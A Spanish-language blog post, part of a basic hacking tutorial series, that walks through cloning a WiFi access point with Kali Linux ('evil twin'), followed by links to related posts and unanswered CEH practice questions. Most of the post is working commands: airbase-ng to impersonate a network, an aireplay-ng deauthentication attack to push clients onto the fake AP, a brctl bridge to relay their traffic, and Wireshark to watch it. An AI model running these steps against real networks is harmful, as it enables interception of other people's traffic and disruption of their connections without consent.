Notice: La función wp_enqueue_script ha sido llamada de forma incorrecta. Los scripts y estilos no se deberían registrar o poner en cola hasta que se carguen los ganchos wp_enqueue_scripts, admin_enqueue_scripts y login_enqueue_scripts. Este aviso ha sido activado por la gestión de nfd_wpnavbar_setting. Por favor, ve depuración en WordPress para más información. (Este mensaje fue añadido en la versión 3.3.0). in /home1/spotsail/public_html/martra/wp-includes/functions.php on line 6078
Clonando un punto de acceso WiFi. Y instalar bridge-utils en Kali, que no es poco. – Pere Martra
No se han encontrado widgets en la barra lateral
Esto es un puente bonito y no las bridge-utils que son feas feas...

Los puntos de acceso WiFi falsos son muy peligrosos, existen, y cualquiera puede ser víctima de ellos.

Estamos ya en la séptima entrada del tutorial de hacking básico Poco a poco hemos ido viendo temas cada vez más interesantes, pero todavía estamos tan solo rascando la superficie. Aunque la verdad es que si has seguido los posts anteriores, los has entendido y probado y has conseguido que funcionasen las técnicas explicadas ya empiezas a tener unos conocimientos importantes. Muchos más de los que puede tener cualquier profesional de IT que no se dedique a la ciberseguridad.

¿No te lo crees? Vamos a ver todo lo que hemos visto hasta ahora, y solo nos ha costado unas cuantas horas: tutorial:
Hemos montado un laboratorio de seguridad con Kali Linux. Hemos visitado la deep web. Realizado un escaneo de puertos. Atacado una WiFi por fuerza bruta, generando millones de contraseñas. Atacado el punto débil de las WiFi, llamado WPS. Finalmente hemos montado un Man In The Middle que era incluso capaz de capturar la contraseña de Facebook….
Es bastante, en serio, es mucho! Vamos a por mas: esta vez vamos a montar un punto de acceso wifi falso, clonando un punto de acceso legítimo. ¿Que para qué sirve? Lo veremos.

EVIL Twin, Clonando una WiFi

Por primera vez en el tutorial nos falta una herramienta en Kali Linux, lo primero que vamos a hacer es instalarla, y por si este tutorial es vuestra primera experiencia con linux, ahora entenderemos que no todo es tan sencillo como en windows o mac.

Esto es un puente bonito y no las bridge-utils que son feas feas…

Instalando bridge-utils

La herramienta a instalar es bridge-utils, pero no hay una forma sencilla de instalarla, pero como cada distribución de Kali mejora probemos con lo más sencillo a ver si funciona a lo primero.
[code language=”shell”]
apt-get install bridge-utils
[/code]
¿Ha funcionado? Perfecto! Ya está!!!!
¿Os saca un mensaje diciendo que no tiene ni idea de que es esto de bridge-utils? Pues tenemos que realizar lo ssiguientes pasos:

  • Editemos el fichero /etc/apt/sources.list
    [code language=”shell”]
    nano /etc/apt/sources.list
    [/code]
    Borramos el contenido del fichero y ponemos:
    [code language=”shell”]
    # deb cdrom:[Debian GNU/Linux 7.0 _Kali_ – Official Snapshot i386 LIVE/INSTALL $
    # deb cdrom:[Debian GNU/Linux 7.0 _Kali_ – Official Snapshot i386 LIVE/INSTALL $
    ## Security updates
    deb http://http.kali.org/ /kali main contrib non-free
    deb http://http.kali.org/ /wheezy main contrib non-free
    deb http://http.kali.org/kali kali-dev main contrib non-free
    deb http://http.kali.org/kali kali-dev main/debian-installer
    deb-src http://http.kali.org/kali kali-dev main contrib non-free
    deb http://http.kali.org/kali kali main contrib non-free
    deb http://http.kali.org/kali kali main/debian-installer
    deb-src http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free
    deb-src http://security.kali.org/kali-security kali/updates main contrib non-fr$
    [/code]
    Con esto le indicamos a Kali donde tiene que ir a buscar los packages de instalación y actualización.
  • Limpiar la cache de apt. Es la herramienta de instalación de packages que vamos a utilizar, y cómo hemos cambiado los directorios donde irá a buscarlos, pues mejor dejarlo limpio como una patena.
    [code language=”shell”]
    apt-get clean
    apt-get update
    apt -f install
    [/code]
    Con esto ya hemos dejado apt y los diferentes package instalados como nuevos, el proceso puede tardar un poco, depende de los packages que tengamos instalados y lo desactualizados que esten.
  • Instalar bridge-utils.
    [code language=”shell”]
    #apt-cache search bridge
    [/code]
    con esto buscamos entre los paquetes que conoce apt, todos los que contengan la palabra bridge, si localizamos a bridge-utils es que ya podemos realizar la instalación.
    bridge-utils package apt
    Aquí vemos como apt encuentra a bridge-utils entre los package que se pueden instalar.

    [code language=”shell”]
    apt-get install bridge-utils
    [/code]

Ya está!!!! Por Fin! Ya tenemos las bridge-utils y ya podemos empezar a clonar el punto de acceso.

Clonando la WiFi.

Lo primero es poner nuestro interface de red en modo monitor, ya lo hemos hecho en casi todos los anteriores post, recordemos cómo:
[code language=”shell”]
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
[/code]

Igual que en los post anteriores ahora toca matar todos los procesos que pueden interferir con nuestra tarjeta de red.
[code language=”shell”]
airmon-ng check wlan0
[/code]
Esta orden nos devolverá una lista de los procesos que están usando la tarjeta de red. Cada proceso tendrá un PID. Lo que tenemos que hacer es matar todos los procesos listados con el comando kill.
[code language=”shell”]
kill 451
kill 650
[/code]
Estos dos comandos mataran los procesos 451 y 650, el PID de vuestros procesos no tiene porqué coincidir con los míos, y pueden ser unos cuantos más de dos. Lo importante es que después de matar todos los procesos volváis a ejecutar airmon-ng y la lista que os devuelve tiene que estar vacía.

Amntes de lanzar el comando que duplicará el punto de acceso necesitamos conocer algunos datos suyos, como el ESSID y BSSIB. lo obtenemos con el comando airodump-ng wlan0.
[code language=”shell”]
airodump-ng wlan0
[/code]

Lista de puntos de acceso obtenidos con airodump-ng
Lo que nos devuelve airodump-ng (He ocultado MAC y ESSID)

Con este listado ya tenemos todos los datos necesarios, ahora ya podemos lanzar el comando que duplicará la red. Concretamente vamos a necesitar, el BSSID, el CH y el ESSID.
[code language=”shell”]
airbase-ng -a 72:01:71:41:A0:19 –essid MIRED_WIFI -c 13 wlan0
[/code]
Con esto crearemos nuestro accespoint!!! Lo que pasa es que tenemos a todo el mundo conectado al accespoint anterior, así que tendremos que hacer algo para que se conecten al nuestro. Lanzamos un ataque de deautenticación para que los clientes al volverse a autenticar lo hagan en nuestro punto de acceso y no en el original.
[code language=”shell”]
aireplay-ng -0 0 -a 72:01:71:41:A0:19 wlan0
[/code]
Con esto los clientes tendrían que irse desconectando del accespoint original y reconectarse al nuestro, siempre y cuando nuestra señal sea más fuerte que la original.

Y entonces ¿porqué narices hemos instalado las bridge-utils? Bueno, ahora tenemos a los clientes conectados a nuestro accespoint, pero los clientes no tienen acceso a internet, tenemos que montar un bridge entre nuestro falso accespoint y el de verdad.

[code language=”shell”]
brctl addbr eviltest
brctl addif eviltest wlan0
brctl addif eviltest at0
ifconfig at0 0.0.0.0 up
dhclient eviltest
[/code]
Lo primero que hacemos es crear eviltest, le podemos poner cualquier nombre. Después relacionamos el interface recién creado con el interface en nuestra máquina con conexión a Internet, en este caso wlan0. Continuamos conectando eviltest con el interface que nos ha creado airbase, que se llama at0. Levantamos at0 y activamos eviltest.

Ahora ya podemos usar wireshark para poder ver el tráfico de los clientes que se nos han conectado.

Viendo el tráfico de la red con wireshark.

Wireshark es tan complejo que necesita de un tutorial para él solo y está totalmente fuera del ámbito de este pequeño tutorial. En Internet hay multitud de información de esta suite. Por ahora ya podemos empezar a jugar creando filtros y buscando la información que queremos encontrar. Aunque ya os avanzo que no vais a ver el tráfico encriptado, que por algo está encriptado!!

Recordad que este post forma parte del tutorial de Hacking / Pen Testing Básico

Montando un laboratorio de Ethical Hacking o “Cyber Security Laboratory I’m really cool”

Me encanta el nombre de Laboratorio de Ciberseguridad, cada vez que lo leo me entran ganas de comprarme una Bata Read more

Así toman el control de nuestros servidores.
Un Reverse Shell Web pudo ser la causa de los "Papeles de Panamá"

¿Recordáis unos abogados de Panamá que perdieron unos papeles? ¿Recordáis que tenían wordpress? ¿Recordáis que no tenían wordpress actualizado? Supongo Read more

CEH 02 segundo test para el Certified Ethical Hacker

Segundo test conteniendo 10 preguntas para preparar la certificación oficial de Certified Ethical Hacker. El objetivo de este examen es ayudar ver si estas preparado a presentarte al CEH, pero sobretodo servir también como guia de estudio. Si no aciertas una pregunta busca el por que y entiendelo, no lo repitas, solo para saber cual es la respuesta correcta.

1. An Intrusion Detection System(IDS) has alerted the network administrator to a possibly malicious sequence of packets went to a Web server in the networks external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file. What type of network tool can be used to determine if these packets are genuinely malicious or simply a false positive?

 
 
 
 

2. You are performing a penetration test. You achieved access via a buffer overflow exploit and you proceed to find interesting data, such as files with usernames and passwords. You find a hidden folder that has the administrators bank account password and login information for the administrators bitcoin account. What should you do?

 
 
 
 

3. You’ve just been hired to perform a pentest on an organization that has been subjected to a large-scale attack. The CIO is concerned with mitigating threats and vulnerabilities to totally eliminate risk. What is one of the first thing you should to when the job?

 
 
 
 

4. Which of the following best describes a distributed denial-of-service attack?

 
 
 
 

5. The Open Web Application Security Project (OWASP) is the worldwide not-for-profit charitable organization focused on improving the security of software. What item is the primary concern on OWASPs Top Ten Project most Critical Web application Security Rules?

 
 
 
 

6. Which of the following tools can be used to crack SAM files in Windows?

 
 
 
 

7. This phase is the very first step in Information Gathering, and it will tell you what the landscape looks like, and also  will increase the odds of success in later phases of the penetration test.  Most experts think that  is the most important phase of ethical hacking in which you need to spend a considerable amount of time. Can you name it?

 
 
 
 

8. Which of the following is the greatest threat posed by backups?

 
 
 
 

9. During a security audit of IT processes, an IS auditor found that there was no documented security procedures. What should the IS auditor do?

 
 
 
 

10. Which of the following is true regarding WEP cracking?

 
 
 
 

Una introducción a uno de los clásicos de la ciberseguridad: los SQL Injection.
Orden SQL Injection

Si estás cansado de oír hablar de los SQL Injection pero nunca te ha quedado muy claro para qué servían... Read more

Por Martra

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *